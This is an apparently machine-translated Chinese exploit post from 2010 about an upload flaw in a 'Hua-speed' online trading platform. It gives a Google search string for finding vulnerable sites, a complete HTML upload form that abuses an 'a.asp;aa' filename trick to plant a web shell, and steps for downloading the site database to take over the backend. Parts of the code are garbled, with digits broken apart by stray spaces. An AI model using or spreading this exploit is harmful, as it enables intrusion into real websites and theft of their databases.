Hua-speed online trading platform oday-vulnerability warning-the black bar safety net

2010-07-27T00:00:00
ID MYHACK58:62201027702
Type myhack58
Reporter 佚名
Modified 2010-07-27T00:00:00

Description

Hua-speed online trading platform oday program: China speed online trading platform Vulnerability description:upload, storm library google keywords: inurl:list_buy. asp? class_1

EXP test: Copy the code save it as html file

<html> <head> <meta http-equiv="Content-Type" content="text/html; charset=gb2312"> <link href="css/manage. css" rel="stylesheet" type="text/css"> </head> <body> <form name="form1" method="post" action="http://www.hackqing.cn/upfile.asp" enctype="multipart/form-data" > <div id="esave" style="position:absolute; top:18px; left:40px; z-index:1 0; visibility:hidden"> <TABLE WIDTH=3 4 0 BORDER=0 CELLSPACING=0 CELLPADDING=0> <TR><td width=2 0%></td> <TD bgcolor=#ff0000 width="6 0%"> <TABLE WIDTH=1 0 0% height=1 2 0 BORDER=0 CELLSPACING=1 CELLPADDING=0> <TR> <td bgcolor=#ffffff align=center><font color=red>are uploading files, please wait...</font></td> </tr> </table> </td><td width=2 0%></td> </tr></table></div> <table class="tableBorder" width="9 0%" border="0" align="center" cellpadding="3" cellspacing="1" bgcolor="#FFFFFF"> <tr> <td align="center"><b><font color="#ffffff">image upload <input type="hidden" name="filepath" value="/a. asp;aa"> <input type="hidden" name="filelx" value=""> <input type="hidden" name="EditName" value=""> <input type="hidden" name="FormName" value=""> <input type="hidden" name="act" value="uploadfile"></font></b> </td> </tr> <tr > <td align="center" id="upid" height="8 0">select a file: <input type="file" name="file1" size="4 0" class="tx1" value=""> <input class=btn type="submit" name="Submit" value="Start upload" class="button" onClick="javascript:mysub()"> </td> </tr> </table> </form> </body> </html>

The upload is completed, right click to view source code, upload horse is in the root directory. If the upload is not, then, put<input type="hidden" name="filepath" value="/a. asp;aa">the value modify the value of“/upfile/a. asp;aaa”, a picture directory should be writable.

google keywords: inurl:list_buy. asp? class_1

If the upload fails, you can directly access inc/config. asp file, storm out of the address database into the backend to get the shell.

Note: premiere of the wandering wind